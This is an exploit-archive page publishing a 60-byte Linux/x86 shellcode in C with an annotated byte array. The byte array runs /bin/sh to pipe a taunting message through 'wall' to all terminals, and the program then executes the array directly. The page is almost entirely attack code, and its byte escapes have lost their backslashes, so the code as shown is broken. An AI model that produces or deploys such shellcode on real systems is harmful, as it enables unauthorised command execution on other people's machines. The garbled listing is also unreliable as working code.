[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
# Published : 2010-04-25
# Author : condis
# Previous Title : Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode
# Next Title : Linux x86 polymorphic forkbombe - 30 bytes


/*

$Id: where-is-wallie.c, v 1.0 2010/04/24 18:32:29 condis Exp $

linux/x86 sends "Phuck3d!" to all terminals (60 bytes) shellcode
by condis

Tested on: Linux Debian

*/

int main(void)
{
	char evil[] =	

		"x6ax0b"              // push   $0xb
		"x58"                  // pop    %eax
		"x99"                  // cltd
		"x52"                  // push   %edx
		"x68x77x61x6cx6c"  // push   $0x6c6c6177
		"x68x21x20x7cx20"  // push   $0x207c2021
		"x68x63x6bx33x64"  // push   $0x64336b63
		"x68x20x50x68x75"  // push   $0x75685020
		"x68x65x63x68x6f"  // push   $0x6f686365
		"x89xe6"              // mov    %esp,%esi
		"x52"                  // push   %edx
		"x66x68x2dx63"      // pushw  $0x632d
		"x89xe1"              // mov    %esp,%ecx
		"x52"                  // push   %edx
		"x68x2fx2fx73x68"  // push   $0x68732f2f
		"x68x2fx62x69x6e"  // push   $0x6e69622f
		"x89xe3"              // mov    %esp,%ebx
		"x52"                  // push   %edx
		"x56"                  // push   %esi
		"x51"                  // push   %ecx
		"x53"                  // push   %ebx
		"x89xe1"              // mov    %esp,%ecx
		"xcdx80"              // int    $0x80


	void(*boom)()=(void*)evil;
	boom();

  	return 0;
}